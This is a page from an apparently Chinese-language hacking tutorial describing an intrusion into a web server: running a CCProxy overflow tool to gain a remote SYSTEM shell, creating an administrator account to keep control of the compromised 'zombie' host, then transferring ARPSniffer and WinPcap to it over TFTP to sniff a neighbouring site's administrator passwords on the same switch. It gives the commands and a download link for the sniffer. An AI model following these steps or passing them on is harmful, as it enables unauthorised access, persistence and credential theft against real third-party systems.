CCProxy溢出程序的使用非常简单，在命令窗口中输入"ccpx 目标IP地址 端口"，然后按提示操作即可（如图2）。在溢出中会询问本机是与攻击目标位于同一个IP段；如果是在同一IP地址段中的话，直接按"y"，就可以开始溢出了；如果本机与攻击目标不在一个IP地址段中的话，按下"n"，溢出程序将继续提示并询问本机是否有一个公网IP地址（如图3），如果没有的话，还需要手工输入自己的网关IP地址才可以开始溢出。溢出成功后，会在当前命令窗口中自动连接攻击目标的24876端口，获得远程主机的一个SYSTEM Shell。剩下来的事就是建立管理员帐号，常常的掌握这台肉机。



图2



图3



三、上传嗅探利器ARPSniffer

现在要通过手里的肉鸡入侵信息港了。首先还是要查看一下两个网站服务器是不是位于同一个交换机下。远程连接肉机，在肉鸡的CMD窗口中输入命令"tracert 攻击目标IP地址"，令人兴奋的是看到直接返回了目标IP地址（如图4），现在可以确定两台主机都在同一交换机下了，看来有戏啦！可以考虑用嗅探的方法从肉鸡上获取信息港的管理员密码或者其它有用的信息。现在要用到的是一个名叫"ARPSniffer.exe"的软件（下载地址：http://admin.77169.org/Soft/uploadsoft/200409/arpsniffer.rar）。这个软件有DOS版和WIN版，RPSniffer也是小榕哥开发的一款工具非常好的嗅探工具，它可以用在交换机的环境下。在使用这个嗅探工具前首先要使用机器上安装WinPCAP驱动。怎么上传ARPSniffer到肉鸡上？还是老方法用TFTP传送。在本机上运行Tfpd32，将本机建成为一个TFTP服务器，点击界面中的"Browse"按钮，选择ARPSniffer下载压缩包的解压路径（如图5），然后在肉鸡的命令窗口中运行"Get -i TFTP服务器IP地址 文件名"即可。在这里下载后的压缩包中有两个版本的程序，我们只需要上传"arpsniffer.exe"和"WinPcap_3_0_a.exe"即可。上传成功后先运行"WinPcap_3_0_a.exe"安装嗅探驱动程序。



图4



图5

上一页  [1] [2] [3] 下一页